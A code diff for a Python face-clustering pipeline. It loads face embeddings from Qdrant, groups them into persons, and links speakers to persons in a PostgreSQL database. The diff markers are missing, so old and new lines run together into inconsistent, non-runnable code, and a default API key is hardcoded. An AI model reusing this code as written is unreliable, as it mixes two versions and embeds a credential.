Changes from previous (broken) version:
|
||||
- REMOVED Stage 2 merge logic (was incorrectly merging different people)
|
||||
"""
|
||||
|
||||
import cv2
|
||||
import argparse
|
||||
import json
|
||||
import numpy as np
|
||||
import os
|
||||
import sys
|
||||
import psycopg2
|
||||
from collections import defaultdict
|
||||
from sklearn.cluster import AgglomerativeClustering
|
||||
|
||||
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
|
||||
from redis_publisher import RedisPublisher
|
||||
|
||||
# Use FaceNet embeddings from face.json instead of DeepFace
|
||||
HAS_DEEPFACE = False
|
||||
print("[FACE_CLUSTER] Using FaceNet embeddings from face.json (DeepFace not required)")
|
||||
|
||||
# 設定
|
||||
UUID = os.getenv("UUID", "quick_preview")
|
||||
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
|
||||
VIDEO_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.mp4")
|
||||
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face.json")
|
||||
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face_clustered.json")
|
||||
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.asrx.json")
|
||||
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
|
||||
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
|
||||
DB_URL = os.getenv("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
|
||||
|
||||
|
||||
def optimized_clustering(embeddings):
|
||||
"""
|
||||
Optimized Clustering for large datasets (e.g. 25k faces).
|
||||
Strategy: Sample -> Agglomerative -> Centroid Assignment
|
||||
"""
|
||||
import numpy as np
|
||||
from sklearn.cluster import AgglomerativeClustering
|
||||
from sklearn.metrics.pairwise import cosine_distances
|
||||
|
||||
n_faces = len(embeddings)
|
||||
print(f" 🚀 Starting optimized clustering for {n_faces} faces...")
|
||||
|
||||
# 1. Sampling
|
||||
sample_size = min(5000, n_faces)
|
||||
if n_faces > sample_size:
|
||||
indices = np.random.choice(n_faces, sample_size, replace=False)
|
||||
sample_embeddings = embeddings[indices]
|
||||
else:
|
||||
sample_embeddings = embeddings
|
||||
indices = np.arange(n_faces)
|
||||
|
||||
print(f" 📊 Sampling {len(sample_embeddings)} faces for clustering structure...")
|
||||
|
||||
# 2. Agglomerative Clustering on Sample
|
||||
clustering = AgglomerativeClustering(
|
||||
n_clusters=None, distance_threshold=0.4, metric="cosine", linkage="average"
|
||||
)
|
||||
sample_labels = clustering.fit_predict(sample_embeddings)
|
||||
|
||||
unique_labels = set(sample_labels)
|
||||
n_clusters = len(unique_labels)
|
||||
print(f" 🔍 Found {n_clusters} unique clusters in sample.")
|
||||
|
||||
# 3. Compute Centroids for each cluster
|
||||
centroids = []
|
||||
for label in unique_labels:
|
||||
cluster_mask = sample_labels == label
|
||||
cluster_faces = sample_embeddings[cluster_mask]
|
||||
# Mean embedding
|
||||
centroid = np.mean(cluster_faces, axis=0)
|
||||
centroids.append(centroid)
|
||||
|
||||
centroids = np.array(centroids) # Shape: (n_clusters, 512)
|
||||
|
||||
# 4. Assign all faces to nearest centroid
|
||||
# Batch processing to save memory
|
||||
print(f" 🏃 Assigning {n_faces} faces to {n_clusters} clusters...")
|
||||
all_labels = np.zeros(n_faces, dtype=int)
|
||||
|
||||
batch_size = 5000
|
||||
for start in range(0, n_faces, batch_size):
|
||||
end = min(start + batch_size, n_faces)
|
||||
batch = embeddings[start:end]
|
||||
dists = cosine_distances(batch, centroids)
|
||||
all_labels[start:end] = np.argmin(dists, axis=1)
|
||||
|
||||
return all_labels
|
||||
CLUSTER_THRESHOLD = 0.35
|
||||
|
||||
|
||||
def main():
|
||||
if not os.path.exists(FACE_JSON_PATH):
|
||||
print("❌ Face JSON not found.")
|
||||
return
|
||||
def write_empty_output(status: str, file_uuid: str, output_path: str):
|
||||
output_data = {
|
||||
"status": status,
|
||||
"file_uuid": file_uuid,
|
||||
"clusters": [],
|
||||
"frames": []
|
||||
}
|
||||
with open(output_path, "w", encoding="utf-8") as f:
|
||||
json.dump(output_data, f, indent=2, ensure_ascii=False)
|
||||
print(f"Wrote empty output ({status}) to {output_path}")
|
||||
|
||||
with open(FACE_JSON_PATH) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
frames_list = face_data.get("frames", [])
|
||||
if not frames_list:
|
||||
print("❌ No frames in JSON.")
|
||||
return
|
||||
|
||||
# Get embeddings from Qdrant
|
||||
print(f"[FACE_CLUSTER] Loading embeddings from Qdrant for {UUID}...")
|
||||
def load_qdrant_faces(uuid: str, publisher: RedisPublisher) -> list:
|
||||
"""Load all face points (payload + vector) from Qdrant _faces for a file."""
|
||||
publisher.progress("face_cluster", 0, 100, "Loading embeddings from Qdrant")
|
||||
try:
|
||||
import requests
|
||||
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "")
|
||||
collection = "_faces"
|
||||
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
# Query all embeddings for this file_uuid
|
||||
response = requests.post(
|
||||
f"{qdrant_url}/collections/{collection}/points/scroll",
|
||||
json={
|
||||
|
||||
all_points = []
|
||||
offset = None
|
||||
while True:
|
||||
body = {
|
||||
"limit": 10000,
|
||||
"with_payload": True,
|
||||
"with_vector": True,
|
||||
"filter": {
|
||||
"must": [
|
||||
{"key": "file_uuid", "match": {"value": UUID}}
|
||||
{"key": "file_uuid", "match": {"value": uuid}}
|
||||
]
|
||||
},
|
||||
"limit": 10000,
|
||||
"with_vector": True
|
||||
},
|
||||
headers=headers
|
||||
)
|
||||
|
||||
if response.status_code == 200:
|
||||
result = response.json()
|
||||
points = result.get("result", {}).get("points", [])
|
||||
print(f"[FACE_CLUSTER] Loaded {len(points)} embeddings from Qdrant")
|
||||
|
||||
# Build face_id -> embedding map
|
||||
embedding_map = {}
|
||||
for point in points:
|
||||
face_id = point.get("payload", {}).get("face_id")
|
||||
vector = point.get("vector")
|
||||
if face_id and vector:
|
||||
embedding_map[face_id] = vector
|
||||
else:
|
||||
print(f"[FACE_CLUSTER] Qdrant query failed: {response.status_code}")
|
||||
embedding_map = {}
|
||||
}
|
||||
}
|
||||
if offset:
|
||||
body["offset"] = offset
|
||||
|
||||
resp = requests.post(
|
||||
f"{qdrant_url}/collections/_faces/points/scroll",
|
||||
json=body,
|
||||
headers=headers,
|
||||
timeout=60
|
||||
)
|
||||
if resp.status_code != 200:
|
||||
print(f"Qdrant scroll error: {resp.status_code}")
|
||||
break
|
||||
|
||||
data = resp.json()
|
||||
batch = data.get("result", {}).get("points", [])
|
||||
all_points.extend(batch)
|
||||
next_offset = data.get("result", {}).get("next_page_offset")
|
||||
if not next_offset:
|
||||
break
|
||||
offset = next_offset
|
||||
|
||||
print(f"Loaded {len(all_points)} points from Qdrant _faces")
|
||||
return all_points
|
||||
except Exception as e:
|
||||
print(f"[FACE_CLUSTER] Failed to load embeddings from Qdrant: {e}")
|
||||
embedding_map = {}
|
||||
print(f"Failed to load embeddings from Qdrant: {e}")
|
||||
return []
|
||||
|
||||
# Use embeddings from Qdrant - match by frame + bbox
|
||||
embeddings = []
|
||||
face_refs = []
|
||||
|
||||
print(f"🔍 Collecting face embeddings for {UUID}...")
|
||||
def cluster_by_trace(points: list, min_faces_per_trace: int = 1, confidence_threshold: float = 0.5) -> tuple:
|
||||
"""
|
||||
Cluster faces by trace_id:
|
||||
1. Filter low-confidence faces
|
||||
2. Group by trace_id
|
||||
3. Compute weighted average embedding per trace
|
||||
"""
|
||||
high_conf_points = [
|
||||
p for p in points
|
||||
if p.get("payload", {}).get("confidence", 0) >= confidence_threshold
|
||||
]
|
||||
print(f"[FILTER] {len(high_conf_points)}/{len(points)} faces pass confidence >= {confidence_threshold}")
|
||||
|
||||
# Build a lookup: (frame, bbox_center) -> embedding
|
||||
# Use frame number and approximate bbox center for matching
|
||||
qdrant_by_frame = {}
|
||||
for point in points:
|
||||
traces = defaultdict(list)
|
||||
for point in high_conf_points:
|
||||
payload = point.get("payload", {})
|
||||
frame = payload.get("frame")
|
||||
bbox = payload.get("bbox", {})
|
||||
vector = point.get("vector")
|
||||
if frame is not None and vector:
|
||||
# Use frame + bbox center as key
|
||||
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
|
||||
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
|
||||
key = (frame, cx, cy)
|
||||
if key not in qdrant_by_frame:
|
||||
qdrant_by_frame[key] = vector
|
||||
trace_id = payload.get("trace_id")
|
||||
if trace_id is not None and trace_id >= 0:
|
||||
traces[trace_id].append(point)
|
||||
|
||||
print(f"[FACE_CLUSTER] Built Qdrant lookup with {len(qdrant_by_frame)} entries")
|
||||
print(f"[TRACE] Found {len(traces)} unique traces")
|
||||
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
frame_num = frame_obj.get("frame", frame_idx)
|
||||
faces = frame_obj.get("faces", [])
|
||||
if not faces:
|
||||
trace_embeddings = {}
|
||||
for trace_id, trace_points in traces.items():
|
||||
if len(trace_points) < min_faces_per_trace:
|
||||
continue
|
||||
|
||||
for face_idx, face in enumerate(faces):
|
||||
x = face.get("x", 0)
|
||||
y = face.get("y", 0)
|
||||
w = face.get("width", 0)
|
||||
h = face.get("height", 0)
|
||||
cx = x + w // 2
|
||||
cy = y + h // 2
|
||||
embeddings = []
|
||||
weights = []
|
||||
for p in trace_points:
|
||||
embeddings.append(p["vector"])
|
||||
weights.append(p.get("payload", {}).get("confidence", 1.0))
|
||||
|
||||
# Try exact match first
|
||||
key = (frame_num, cx, cy)
|
||||
if key in qdrant_by_frame:
|
||||
embeddings.append(qdrant_by_frame[key])
|
||||
face_refs.append({"frame_idx": frame_idx, "face_idx": face_idx})
|
||||
continue
|
||||
embeddings = np.array(embeddings)
|
||||
weights = np.array(weights)
|
||||
weights = weights / weights.sum()
|
||||
|
||||
# Try approximate match (within 50 pixels)
|
||||
for (qf, qx, qy), vec in qdrant_by_frame.items():
|
||||
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
|
||||
embeddings.append(vec)
|
||||
face_refs.append({"frame_idx": frame_idx, "face_idx": face_idx})
|
||||
break
|
||||
avg_embedding = np.average(embeddings, axis=0, weights=weights)
|
||||
avg_embedding = avg_embedding / np.linalg.norm(avg_embedding)
|
||||
|
||||
if not embeddings:
|
||||
print("❌ No embeddings found in Qdrant.")
|
||||
return
|
||||
trace_embeddings[trace_id] = {
|
||||
"embedding": avg_embedding,
|
||||
"face_count": len(trace_points),
|
||||
"avg_confidence": float(np.mean(weights)),
|
||||
"frames": [p.get("payload", {}).get("frame") for p in trace_points],
|
||||
"points": trace_points
|
||||
}
|
||||
|
||||
embeddings = np.array(embeddings)
|
||||
print(f"✅ Collected {len(embeddings)} face embeddings from Qdrant.")
|
||||
print(f"[TRACE] {len(trace_embeddings)} traces with >= {min_faces_per_trace} faces")
|
||||
return trace_embeddings, traces
|
||||
|
||||
# 2. 聚類
|
||||
print(f"🧠 Clustering {len(embeddings)} faces...")
|
||||
|
||||
def single_stage_clustering(trace_embeddings: dict) -> dict:
|
||||
"""
|
||||
Single-stage AgglomerativeClustering on trace means.
|
||||
No Stage 2 merge (the problematic logic has been removed).
|
||||
"""
|
||||
if not trace_embeddings:
|
||||
return {}
|
||||
|
||||
trace_ids = list(trace_embeddings.keys())
|
||||
n_traces = len(trace_ids)
|
||||
|
||||
if n_traces == 0:
|
||||
return {}
|
||||
|
||||
if n_traces == 1:
|
||||
return {trace_ids[0]: 0}
|
||||
|
||||
embeddings = np.array([trace_embeddings[tid]["embedding"] for tid in trace_ids])
|
||||
|
||||
print(f"[CLUSTER] Clustering {n_traces} traces (threshold={CLUSTER_THRESHOLD})...")
|
||||
clustering = AgglomerativeClustering(
|
||||
n_clusters=None, distance_threshold=0.4, metric="cosine", linkage="average"
|
||||
n_clusters=None,
|
||||
distance_threshold=CLUSTER_THRESHOLD,
|
||||
metric="cosine",
|
||||
linkage="average"
|
||||
)
|
||||
labels = clustering.fit_predict(embeddings)
|
||||
|
||||
unique_labels = set(labels)
|
||||
label_to_person = {l: f"Person_{i}" for i, l in enumerate(unique_labels)}
|
||||
print(
|
||||
f"👥 Detected {len(unique_labels)} unique persons: {[label_to_person[l] for l in unique_labels]}"
|
||||
)
|
||||
print(f"[CLUSTER] Detected {len(unique_labels)} unique persons")
|
||||
|
||||
# 3. 更新 JSON
|
||||
for ref, label in zip(face_refs, labels):
|
||||
f_idx = ref["frame_idx"]
|
||||
face_idx = ref["face_idx"]
|
||||
person_id = label_to_person[label]
|
||||
trace_to_person = {}
|
||||
for i, trace_id in enumerate(trace_ids):
|
||||
trace_to_person[trace_id] = labels[i]
|
||||
|
||||
if f_idx < len(frames_list):
|
||||
faces = frames_list[f_idx].get("faces", [])
|
||||
if face_idx < len(faces):
|
||||
frames_list[f_idx]["faces"][face_idx]["person_id"] = person_id
|
||||
|
||||
# 保存
|
||||
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
|
||||
json.dump(face_data, f, indent=2, ensure_ascii=False)
|
||||
print(f"✅ Saved clustered data to {OUTPUT_JSON_PATH}")
|
||||
|
||||
# 4. 自動綁定 Speaker
|
||||
auto_bind_speakers()
|
||||
return trace_to_person
|
||||
|
||||
|
||||
def auto_bind_speakers():
|
||||
if not os.path.exists(OUTPUT_JSON_PATH) or not os.path.exists(ASRX_JSON_PATH):
|
||||
print("⚠️ Missing data for speaker binding.")
|
||||
print("Missing data for speaker binding.")
|
||||
return
|
||||
|
||||
with open(OUTPUT_JSON_PATH) as f:
|
||||
@@ -248,61 +207,48 @@ def auto_bind_speakers():
|
||||
with open(ASRX_JSON_PATH) as f:
|
||||
asrx_data = json.load(f)
|
||||
|
||||
print("🔗 Auto-binding Speakers to Persons...")
|
||||
print("Auto-binding Speakers to Persons...")
|
||||
|
||||
# 建立 Face 時間列表
|
||||
face_spans = []
|
||||
for frame_obj in face_clustered.get("frames", []):
|
||||
ts = frame_obj.get("timestamp")
|
||||
for face in frame_obj.get("faces", []):
|
||||
person_id = face.get("person_id")
|
||||
person_id = face.get("cluster_id")
|
||||
if person_id and ts is not None:
|
||||
face_spans.append({"ts": ts, "person_id": person_id})
|
||||
|
||||
speaker_person_counts = {}
|
||||
|
||||
# 對於每個說話片段,找出畫面中出現的人
|
||||
for seg in asrx_data.get("segments", []):
|
||||
start = seg.get("start")
|
||||
end = seg.get("end")
|
||||
speaker = seg.get("speaker_id")
|
||||
if not speaker:
|
||||
if not speaker or start is None or end is None:
|
||||
continue
|
||||
|
||||
# 找時間重疊
|
||||
candidates = [f for f in face_spans if start <= f["ts"] <= end]
|
||||
candidates = [f for f in face_spans if f.get("ts") is not None and start <= f["ts"] <= end]
|
||||
if candidates:
|
||||
# 投票
|
||||
person_counts = {}
|
||||
for c in candidates:
|
||||
pid = c["person_id"]
|
||||
person_counts[pid] = person_counts.get(pid, 0) + 1
|
||||
|
||||
if speaker not in speaker_person_counts:
|
||||
speaker_person_counts[speaker] = {}
|
||||
|
||||
best_person = max(person_counts, key=person_counts.get)
|
||||
speaker_person_counts[speaker][best_person] = (
|
||||
speaker_person_counts[speaker].get(best_person, 0) + 1
|
||||
)
|
||||
|
||||
# 寫入資料庫
|
||||
try:
|
||||
conn = psycopg2.connect(DB_URL)
|
||||
cur = conn.cursor()
|
||||
|
||||
for speaker, persons in speaker_person_counts.items():
|
||||
if not persons:
|
||||
continue
|
||||
best_person = max(persons, key=persons.get)
|
||||
print(
|
||||
f" 🎤 {speaker} is likely {best_person} ({persons[best_person]} votes)"
|
||||
)
|
||||
print(f" {speaker} is likely {best_person} ({persons[best_person]} votes)")
|
||||
|
||||
# 1. 找或建 Talent
|
||||
cur.execute("SELECT id FROM talents WHERE real_name = %s", (best_person,))
|
||||
row = cur.fetchone()
|
||||
|
||||
if row:
|
||||
talent_id = row[0]
|
||||
else:
|
||||
@@ -311,9 +257,8 @@ def auto_bind_speakers():
|
||||
(best_person,),
|
||||
)
|
||||
talent_id = cur.fetchone()[0]
|
||||
print(f" ✨ Created Talent #{talent_id} ({best_person})")
|
||||
print(f" Created Talent #{talent_id} ({best_person})")
|
||||
|
||||
# 2. 綁定 Speaker
|
||||
cur.execute(
|
||||
"""
|
||||
INSERT INTO identity_bindings (talent_id, binding_type, binding_value, source, confidence)
|
||||
@@ -322,14 +267,205 @@ def auto_bind_speakers():
|
||||
""",
|
||||
(talent_id, speaker),
|
||||
)
|
||||
print(f" ✅ Bound {speaker} -> {best_person}")
|
||||
print(f" Bound {speaker} -> {best_person}")
|
||||
|
||||
conn.commit()
|
||||
cur.close()
|
||||
conn.close()
|
||||
except Exception as e:
|
||||
print(f" ❌ DB Error: {e}")
|
||||
print(f" DB Error: {e}")
|
||||
|
||||
|
||||
def main():
|
||||
global OUTPUT_JSON_PATH, UUID
|
||||
|
||||
parser = argparse.ArgumentParser(description="Face Clustering Processor V3")
|
||||
parser.add_argument("video_path", help="Path to video file")
|
||||
parser.add_argument("output_path", help="Path to output JSON file")
|
||||
parser.add_argument("--uuid", help="Video UUID (optional, overrides env var)")
|
||||
parser.add_argument("--force", action="store_true", help="Overwrite existing output")
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
OUTPUT_JSON_PATH = args.output_path
|
||||
output_dir = os.path.dirname(args.output_path)
|
||||
if args.uuid:
|
||||
uuid = args.uuid
|
||||
else:
|
||||
uuid = os.path.basename(args.video_path).rsplit(".", 1)[0]
|
||||
UUID = uuid
|
||||
|
||||
face_json_path = os.path.join(output_dir, f"{uuid}.face.json")
|
||||
if not os.path.exists(face_json_path):
|
||||
face_json_path = os.path.join(output_dir, uuid, f"{uuid}.face.json")
|
||||
|
||||
publisher = RedisPublisher(uuid)
|
||||
publisher.info("face_cluster", "Face clustering started")
|
||||
|
||||
if not os.path.exists(face_json_path):
|
||||
print("Face JSON not found.")
|
||||
write_empty_output("no_face_json", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No face.json found")
|
||||
return
|
||||
|
||||
with open(face_json_path) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
frames_list = face_data.get("frames", [])
|
||||
if not frames_list:
|
||||
print("No frames in JSON (no faces).")
|
||||
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No faces to cluster")
|
||||
return
|
||||
|
||||
fps_value = face_data.get("fps", 23.98)
|
||||
|
||||
points = load_qdrant_faces(uuid, publisher)
|
||||
if not points:
|
||||
print("No embeddings found in Qdrant.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No embeddings in Qdrant")
|
||||
return
|
||||
|
||||
publisher.progress("face_cluster", 10, 100, f"Loaded {len(points)} Qdrant points")
|
||||
|
||||
trace_embeddings, traces = cluster_by_trace(
|
||||
points,
|
||||
min_faces_per_trace=1,
|
||||
confidence_threshold=0.5
|
||||
)
|
||||
|
||||
if not trace_embeddings:
|
||||
print("No valid traces found.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "No valid traces")
|
||||
return
|
||||
|
||||
publisher.progress("face_cluster", 30, 100, f"Found {len(trace_embeddings)} traces")
|
||||
|
||||
trace_to_person = single_stage_clustering(trace_embeddings)
|
||||
if not trace_to_person:
|
||||
print("Clustering produced no results.")
|
||||
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
|
||||
publisher.complete("face_cluster", "Clustering empty")
|
||||
return
|
||||
|
||||
n_persons = len(set(trace_to_person.values()))
|
||||
print(f"Clustering result: {n_persons} persons ({len(trace_to_person)} traces)")
|
||||
publisher.progress("face_cluster", 50, 100, f"Found {n_persons} persons")
|
||||
|
||||
qdrant_by_frame_trace = {}
|
||||
for point in points:
|
||||
payload = point.get("payload", {})
|
||||
frame = payload.get("frame")
|
||||
trace_id = payload.get("trace_id", -1)
|
||||
bbox = payload.get("bbox", {})
|
||||
if frame is not None and trace_id >= 0:
|
||||
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
|
||||
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
|
||||
key = (frame, cx, cy)
|
||||
qdrant_by_frame_trace[key] = trace_id
|
||||
|
||||
matched_count = 0
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
frame_num = frame_obj.get("frame", frame_idx)
|
||||
for face in frame_obj.get("faces", []):
|
||||
x = face.get("x", 0)
|
||||
y = face.get("y", 0)
|
||||
w = face.get("width", 0)
|
||||
h = face.get("height", 0)
|
||||
cx = x + w // 2
|
||||
cy = y + h // 2
|
||||
key = (frame_num, cx, cy)
|
||||
|
||||
trace_id = qdrant_by_frame_trace.get(key)
|
||||
if trace_id is None:
|
||||
for (qf, qx, qy), tid in qdrant_by_frame_trace.items():
|
||||
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
|
||||
trace_id = tid
|
||||
break
|
||||
|
||||
if trace_id is not None and trace_id in trace_to_person:
|
||||
person_label = trace_to_person[trace_id]
|
||||
face["person_id"] = f"Person_{person_label}"
|
||||
matched_count += 1
|
||||
|
||||
print(f" Assigned person_id to {matched_count} faces")
|
||||
|
||||
if matched_count == 0:
|
||||
print("No faces matched to any trace - check Qdrant data integrity")
|
||||
publisher.progress("face_cluster", 100, 100, "No trace matches")
|
||||
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
|
||||
return
|
||||
|
||||
publisher.progress("face_cluster", 70, 100, f"Matched {matched_count} faces")
|
||||
|
||||
person_face_count = defaultdict(int)
|
||||
person_best_face = {}
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
for face in frame_obj.get("faces", []):
|
||||
person_id = face.get("person_id")
|
||||
if not person_id:
|
||||
continue
|
||||
person_face_count[person_id] += 1
|
||||
confidence = face.get("confidence", 0.9)
|
||||
if person_id not in person_best_face or confidence > person_best_face[person_id]["confidence"]:
|
||||
person_best_face[person_id] = {
|
||||
"face_id": f"face_{frame_idx}_{frame_idx}",
|
||||
"confidence": confidence,
|
||||
"frame": frame_obj.get("frame", frame_idx),
|
||||
"bbox": {
|
||||
"x": face.get("x"),
|
||||
"y": face.get("y"),
|
||||
"width": face.get("width"),
|
||||
"height": face.get("height")
|
||||
}
|
||||
}
|
||||
|
||||
person_labels_sorted = sorted(person_face_count.keys(), key=lambda p: -person_face_count[p])
|
||||
clusters = []
|
||||
for person_id in person_labels_sorted:
|
||||
cluster_entry = {
|
||||
"cluster_id": person_id,
|
||||
"face_count": person_face_count[person_id],
|
||||
"representative_face": person_best_face.get(person_id)
|
||||
}
|
||||
clusters.append(cluster_entry)
|
||||
|
||||
output_frames = []
|
||||
for frame_idx, frame_obj in enumerate(frames_list):
|
||||
timestamp = frame_obj.get("timestamp", frame_obj.get("frame", 0) / fps_value if fps_value > 0 else 0)
|
||||
output_faces = []
|
||||
for face in frame_obj.get("faces", []):
|
||||
person_id = face.get("person_id")
|
||||
if person_id:
|
||||
output_faces.append({
|
||||
"face_id": f"face_{frame_idx}_{frame_idx}",
|
||||
"cluster_id": person_id,
|
||||
"confidence": face.get("confidence", 0.9),
|
||||
})
|
||||
if output_faces:
|
||||
output_frames.append({
|
||||
"frame": frame_obj.get("frame", frame_idx),
|
||||
"timestamp": timestamp,
|
||||
"faces": output_faces,
|
||||
})
|
||||
|
||||
output_data = {
|
||||
"status": "has_faces",
|
||||
"file_uuid": UUID,
|
||||
"clusters": clusters,
|
||||
"frames": output_frames,
|
||||
}
|
||||
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
|
||||
json.dump(output_data, f, indent=2, ensure_ascii=False)
|
||||
print(f"Saved clustered data to {OUTPUT_JSON_PATH}")
|
||||
publisher.progress("face_cluster", 90, 100, f"{len(clusters)} clusters")
|
||||
|
||||
auto_bind_speakers()
|
||||
|
||||
publisher.complete("face_cluster", f"{len(clusters)} clusters")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
main()
|
||||
+25
-26
@@ -35,7 +35,8 @@ from redis_publisher import RedisPublisher
|
||||
from qdrant_faces import push_face_embeddings_batch
|
||||
|
||||
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
|
||||
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_face_pose")
|
||||
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_face")
|
||||
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_face")
|
||||
FACENET_PATH = os.path.join(SCRIPT_DIR, "..", "models", "facenet512.mlpackage")
|
||||
|
||||
# Pose angle classification from roll/yaw
|
||||
@@ -113,33 +114,33 @@ class FaceProcessorVision:
|
||||
return None
|
||||
|
||||
def process_with_swift(self) -> Dict:
|
||||
"""Step 1: Run swift_face_pose to get bbox + pose (generates face.json + pose.json)"""
|
||||
print(f"[FACE_V2] Step 1: Vision detection (face + pose)...")
|
||||
"""Step 1: Run swift_face to get bbox (generates face_detect.json only)
|
||||
|
||||
Note: swift_face only does face detection.
|
||||
Pose and appearance expansion happen later via separate processors:
|
||||
- swift_pose_expansion reads face_traced.json (with trace_id)
|
||||
- swift_appearance_expansion reads pose.json
|
||||
"""
|
||||
print(f"[FACE_V2] Step 1: Vision detection (face only)...")
|
||||
|
||||
# Build swift_face_pose if needed
|
||||
if not os.path.exists(SWIFT_BIN):
|
||||
# Build swift_face if needed
|
||||
if not os.path.exists(SWIFT_BIN) and not os.path.exists(SWIFT_BIN_DEBUG):
|
||||
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
|
||||
print(f"[FACE_V2] Building swift_face_pose in {build_dir}...")
|
||||
print(f"[FACE_V2] Building swift_face in {build_dir}...")
|
||||
subprocess.run(
|
||||
["swift", "build", "-c", "debug", "--product", "swift_face_pose"],
|
||||
["swift", "build", "-c", "release", "--product", "swift_face"],
|
||||
cwd=build_dir, check=True
|
||||
)
|
||||
|
||||
# Determine which binary to use
|
||||
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
|
||||
|
||||
swift_face_out = self.output_path.replace(".json", "_detect.json")
|
||||
# Pose output: same directory, but replace "face" with "pose" in filename
|
||||
output_dir = os.path.dirname(self.output_path)
|
||||
output_basename = os.path.basename(self.output_path)
|
||||
pose_basename = output_basename.replace("face", "pose")
|
||||
swift_pose_out = os.path.join(output_dir, pose_basename)
|
||||
# Appearance output: same directory, but replace "face" with "appearance" in filename
|
||||
appearance_basename = output_basename.replace("face", "appearance")
|
||||
swift_appearance_out = os.path.join(output_dir, appearance_basename)
|
||||
|
||||
cmd = [
|
||||
SWIFT_BIN,
|
||||
swift_bin,
|
||||
self.video_path,
|
||||
swift_face_out,
|
||||
swift_pose_out,
|
||||
swift_appearance_out,
|
||||
"--sample-interval", str(self.sample_interval),
|
||||
]
|
||||
if self.uuid:
|
||||
@@ -169,10 +170,10 @@ class FaceProcessorVision:
|
||||
pass
|
||||
log_f.close()
|
||||
if proc.returncode != 0:
|
||||
stderr_out = proc.stderr.read()
|
||||
stderr_out = proc.stderr.read() if proc.stderr else ""
|
||||
if stderr_out:
|
||||
print(stderr_out.strip(), file=sys.stderr)
|
||||
raise RuntimeError(f"swift_face_pose exited with code {proc.returncode}")
|
||||
raise RuntimeError(f"swift_face exited with code {proc.returncode}")
|
||||
|
||||
elapsed = time.time() - t0
|
||||
print(f"[FACE_V2] Detection done in {elapsed:.1f}s")
|
||||
@@ -180,10 +181,6 @@ class FaceProcessorVision:
|
||||
with open(swift_face_out) as f:
|
||||
face_data = json.load(f)
|
||||
|
||||
# Also check if pose.json was generated (for reference)
|
||||
if os.path.exists(swift_pose_out):
|
||||
print(f"[FACE_V2] Pose file generated: {swift_pose_out}")
|
||||
|
||||
return face_data
|
||||
|
||||
def embed_and_save(self, detection_data: Dict):
|
||||
@@ -215,7 +212,7 @@ class FaceProcessorVision:
|
||||
for frame_info in frames:
|
||||
frame_num = frame_info["frame"]
|
||||
faces = []
|
||||
for face in frame_info.get("faces", []):
|
||||
for face_idx, face in enumerate(frame_info.get("faces", [])):
|
||||
bb = face["bbox"]
|
||||
x, y, w, h = bb["x"], bb["y"], bb["width"], bb["height"]
|
||||
|
||||
@@ -242,9 +239,10 @@ class FaceProcessorVision:
|
||||
if emb is not None:
|
||||
embed_count += 1
|
||||
# Collect for batch Qdrant push
|
||||
# Use face_idx to distinguish multiple faces in same frame
|
||||
all_embeddings.append({
|
||||
"frame": frame_num,
|
||||
"trace_id": 0, # Initial, updated by face_tracker
|
||||
"trace_id": face_idx, # Use face_idx as unique identifier within frame
|
||||
"bbox": {"x": x, "y": y, "width": w, "height": h},
|
||||
"confidence": face.get("confidence", 0.5),
|
||||
"embedding": emb,
|
||||
@@ -345,6 +343,7 @@ def main():
|
||||
parser.add_argument("--uuid", "-u", default="")
|
||||
parser.add_argument("--sample-interval", type=int, default=3)
|
||||
parser.add_argument("--force", action="store_true")
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
args = parser.parse_args()
|
||||
|
||||
publisher = RedisPublisher(args.uuid) if args.uuid else None
|
||||
|
||||
@@ -0,0 +1,278 @@
|
||||
